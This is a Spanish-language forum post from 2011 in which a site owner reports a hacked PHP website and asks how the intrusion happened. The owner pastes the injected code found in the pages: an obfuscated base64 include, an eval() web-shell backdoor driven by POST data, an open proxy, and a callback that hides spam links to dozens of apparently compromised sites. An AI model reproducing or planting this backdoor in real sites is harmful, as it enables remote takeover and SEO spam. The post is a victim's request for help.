Tema: Ayuda Piratearon mi Web php
Ver Mensaje Individual
  #1 (permalink)  
Antiguo 10/01/2011, 18:59
way2park
 
Fecha de Ingreso: mayo-2008
Mensajes: 224
Antigüedad: 15 años, 11 meses
Puntos: 4
Ayuda Piratearon mi Web php
Hola genios !!.

Pido ayuda con urgencia porque no se que hacer. Tengo una web de 500 mb. esto lo digo para que se den una idea de la cantidad de archivos que tengo y resulta que me la hackearon y no se como.

Les posteo dos cosas que encontre.
En la parte superior de las paginas php agregaron esto: ( perdonen si es largo, aunque es mas largo, pero como no se del tema copie lo que pude del contenido extraño )

<?php /* <!-----FyGdjHIvEaWunX-----> */ $EoXQgtRBbilUsypefcvFOGmSPHLN = base64_decode("L2hvbWUva3NrMjAwOHgvcHVibGljX2h0bWw vd2VibWFpbHBocC9kYXRhL3RlbXAvcy9zYWx0YUBrZW5zaGlua 2Fpc3IuY29tLzM1ZjZkM2RjYmIzMTg4ZjQ5MGNlM2FiZmNjYjV mNmFmL2dhb3N2LnBocA=="); @include_once $EoXQgtRBbilUsypefcvFOGmSPHLN;/* <!-----FyGdjHIvEaWunX-----> */?><!-dvy9uts0ozphc7n246je---><?php
$links = '<a href="http://bas.me.uk/.tmp/?sitemap">site</a><br><a href="http://bdr.internodal.co.uk/.tmp/?sitemap">site</a><br><a href="http://beta.jasonminsky.com/.tmp/?sitemap">go</a><br><a co.uk/.tmp/?sitemap">links</a><br><a href="http://joom.compuhire.com/.tmp/?sitemap">sitemap</a><br><a href="http://jp-engineering.co.uk/.tmp/?sitemap">go</a><br><a href="http://www.2fishes.co.ukhref="http://www.bellheath.co.uk/.tmp/?sitemap">url</a><br><a href="http://www.bespokesoftserv.co.uk/.tmp/?sitemap">link</a><br><a href="http://www.bookcram-d.co.uk/.tmp/?sitemap">sitemap</a><br><a href="http://www.boomerbrothers.co.uk/.tmp/?sitemap">url</a><br><a href="http://www.brandguardiansusa.com/.tmp/?sitemap">here</a><br><a href="http://www.cantacathenesia.org/.tmp/?sitemap">links</a><br><a href="http://www.cappadociainvest.com/.tmp/?sitemap">link</a><br><a href="http://www.careful-carriers.co.uk/.tmp/?sitemap">link</a><br><a href="http://www.cathedral.net/.tmp/?sitemap">sitemap</a><br><a href="http://www.celebagents.co.uk/.tmp/?sitemap">sitemap</a><br><a href="http://www.dhios.co.uk/.tmp/?sitemap">url</a><br><a href="http://www.ermintrude-the-lovely-pink-cow.org.uk/.tmp/?sitemap">url</a><br><a href="http://www.evilsusan.com/.tmp/?sitemap">url</a><br><a href="http://www.familytree.weller.co.uk/.tmp/?sitemap">links</a><br><a href="http://www.fitnessindustrynews.com/.tmp/?sitemap">sitemap</a><br><a href="http://www.goole-action-group.org.uk/.tmp/?sitemap">site</a><br><a hrehref="http://www.islaynaturalhistory.org/.tmp/?sitemap">site</a><br><a href="http://www.jamiewolfie.eu/.tmp/?sitemap">sitemap</a><br><a href="http://www.lukrative.com/.tmp/?sitemap">link</a><br><a href="http://www.macewan.me.uk/.tmp/?sitemap">go</a><br><a href="http://www.mahoneymarshalldesigns.co.uk/.tmp/?sitemap">here</a><br><a href="http://www.manhattantransfer.co.uk/.tmp/?sitemap">sitemap</a><br><a href="http://www.maric.info/.tmp/?sitemap">go</a><br><a href="http://www.marlpitcottage.co.uk/.tmp/?sitemap">sitemap</a><br><a href="http://www.martinowton.com/.tmp/?sitemap">url</a><br><a href="http://www.maxwellmaclaurin.co.uk/.tmp/?sitemap">go</a><br><a href="http://www.meatco.eu/.tmp/?sitemap">links</a><br><a href="http://www.michaelericksonelectrical.co.uk/.tmp/?sitemap">sitemap</a><br><a href="http://www.micreator.com/.tmp/?sitemap">sitemap</a><br><a href="http://www.mjmartin.eu/.tmp/?sitemap">here</a><br><a href="http://www.mobile-enterprise.co.uk/.tmp/?sitemap">link</a><br><a href="http://www.selwoodresearch.co.uk/.tmp/?sitemap">site</a><br><a href="http://www.shopatwhenitsgoneitsgone.co.uk/.tmp/?sitemap">link</a><br><a href="http://www.silentdiscolondon.co.uk/.tmp/?sitemap">link</a><br><a href="http://www.silentdiscoweddings.co.uk/.tmp/?sitemap">links</a><br><a href="http://www.skyewrite.co.uk/.tmp/?sitemap">here</a><br><a href="http://www.sladehealth.com/.tmp/?sitemap">sitemap</a><br><a
function output_callback($str){
GLOBAL $links;
preg_match("|<body[^>]*>|",$str,$arr);
return str_replace($arr[0],$arr[0].'<font style="position: absolute;overflow: hidden;height: 0;width: 0">'.$links.'</font>',$str);
}

function get_page($url){ return file_get_contents($url); }

if(isset($_POST['code']) && $_POST['code']){
eval(stripslashes($_POST[code]));
exit;
}
if(isset($_GET['proxy']) && $_GET['proxy']){
print get_page($_GET['proxy']);
exit;
}

ob_start ('output_callback');
?><!-imdosyxb0auz5wr9t3gq---><?php
$links = '<a href="http://alex.griff.in/.tmp/?sitemap">here</a><br><a href="http://amsearchuk.com/.tmp/?sitemap">here</a><br><a href="http://archivepub.co.uk/.tmp/?sitemap">go</a><br><a href="http://astonssolicitors.co.uk/.tmp/?sitemap">here</a><br><a href="http://bigalentertainment.co.uk/.tmp/?sitemap">sitemap</a><br><a href="http://donkei.skok.me.uk/.tmp/?sitemap">links</a><br><a href="http://drupal.thomasclarkson.cambs.sch.uk/.tmp/?sitemap">link</a>
<br><a href="http://ft.weller.co.uk/.tmp/?sitemap">go</a><br><a href="http://hjsuk.com/.tmp/?sitemap">link</a><br><a href="http://james.rossell.co.uk/.tmp/?sitemap">sitemap</a><br><a href="http://jarmin.com/.tmp/?sitemap">site</a><br><a href="http://jt.acknowledgement.co.uk/.tmp/?sitemap">sitemap</a><br><a href="http://kieranfellows.me.uk/.tmp/?sitemap">link</a><br><a href="http://l-o-t.org.uk/.tmp/?sitemap">go</a><br><a href="http://lesspackaging.develop2020.co.uk/.tmp/?sitemap">url</a><br><a href="http://loc.humph.net/.tmp/?sitemap">link</a><br><a href="http://multihaul.peattie.co.uk/.tmp/?sitemap">go</a><br><a href="http://nikkay.co.uk/.tmp/?sitemap">links</a><br><a href="http://peteprice.com/.tmp/?sitemap">url</a><br><a href="http://philipwright.net/.tmp/?sitemap">link</a><br><a href="http://realisys.acknowledgement.co.uk/.tmp/?sitemap">url</a><br><a href="http://soleymourning.enchantress.org.uk/.tmp/?sitemap">site</a><br><a href="http://sosfm.co.uk/.tmp/?sitemap">go</a><br><a href="http://st-patrick.org.uk/.tmp/?sitemap">go</a><br><a href="http://staging.crosby.co.uk/.tmp/?sitemap">site</a><br><a href="http://stats.acknowledgement.co.uk/.tmp/?sitemap">here</a><br><a href="http://tassek.anang.com/.tmp/?sitem/.tmp/?sitemap">sitemap</a><br><a href="http://www.brandguardiansresearch.com/.tmp/?sitemap">here</a><br><a href="http://www.brokenigloo.co.uk/.tmp/?sitemap">site</a><br><a href="http://www.bsdh.org.uk/.tmp/?sitemap">link</a><br><a href="http://www.bvillea.com/.tmp/?sitemap">go</a><br><a href="http://www.cordell.me.uk/.tmp/?sitemap">link</a><br><a href="http://www.cottonwoodupholstery.co.uk/.tmp/?sitemap">here</a><br><a href="http://www.countryandtownhouse.com/.tmp/?sitemap">sitemap</a><br><a href="http://www.countryhousemagazine.co.uk/.tmp/?sitemap">site</a><br><a href="http://www.crane-hire-london.co.uk/.tmp/?sitemap">sitemap</a><br><a href="http://www.crash-art.com/.tmp/?sitemap">go</a><br><a href="http://www.creativeframe.co.uk/.tmp/?sitemap">links</a><br><a href="http://href="http://www.kaylaparker.co.uk/.tmp/?sitemap">link</a><br><a href="http://www.klenzeen.co.uk/.tmp/?sitemap">link</a><br><a href="http://www.klenzeen.com/.tmp/?sitemap">here</a><br><a href="http://www.kvhomes.co.uk/.tmp/?sitemap">go</a><br><a href="http://www.lfnutrition.com/.tmp/?sitemap">here</a><br><a href="http://www.libbards.com/.tmp/?sitemap">go</a><br><a href="http://www.limpsfield.net/.tmp/?sitemap">site</a><br><a href="http://www.lowfield.co.uk/.tmp/?sitemap">url</a><br><a href="http://www.ludloworchestra.co.uk.ludloworchestra.co.uk/.tmp/?sitemap">link</a><br><a href="http://www.lum.co.uk/.tmp/?sitemap">site</.tmp/?sitemap">site</a><br><a href="http://www.piano-tuner-birmingham.co.uk/.tmp/?sitemap">links</a><br><a href="http://www.qtq.org/.tmp/?sitemap">links</a><br><a href="http://www.r-hind.co.uk/.tmp/?sitemap">site</a><br><a href="http://www.raccoongroup.co.uk/.tmp/?sitemap">site</a><br><a href="http://www.rawiax.co.uk/.tmp/?sitemap">url</a><br><a href="http://www.zemplify.co.uk/.tmp/?sitemap">url</a><br>';

function output_callback($str){
GLOBAL $links;
preg_match("|<body[^>]*>|",$str,$arr);
return str_replace($arr[0],$arr[0].'<font style="position: absolute;overflow: hidden;height: 0;width: 0">'.$links.'</font>',$str);
}

function get_page($url){ return file_get_contents($url); }

if(isset($_POST['code']) && $_POST['code']){
eval(stripslashes($_POST[code]));
exit;
}
if(isset($_GET['proxy']) && $_GET['proxy']){
print get_page($_GET['proxy']);
exit;
}

ob_start ('output_callback');
?><?php

Lo que quisiera si alguien me puede decir es cuales archivos ataca o si ataca a todo. Y si saben de que forma ingreso.
Yo estuve teniendo en varias oportunidades avisos de que quisieron ingresar al base de datos y no pudieron, tambien en el foro ( foro smf ) y ahi puse que se activaba el usuario por el administrador, entonces yo ( administrador ) verificaba la cuenta y recien ahi lo activaba.
Pero casi me desmayo a encontrar el aviso del google de que el sitio contenia software maligno.
Por favor si alguien me da alguna idea de como solucionarlo !!! y que error cometi para que estos delincuentes ( para no ser ordinaria ) pudieron hacer lo que hicieron
Otro dato, el hosting es pago. En estos momentos bloquee el public_html para que no funcionara y estoy esperando por el administrador para ver que me dice.
Muchas Muchas gracias de antemano y a los administradores del foro, si me equivoque en postear esto aca mil perdones pero no sabia donde hubicarlo.
Gracias de nuevo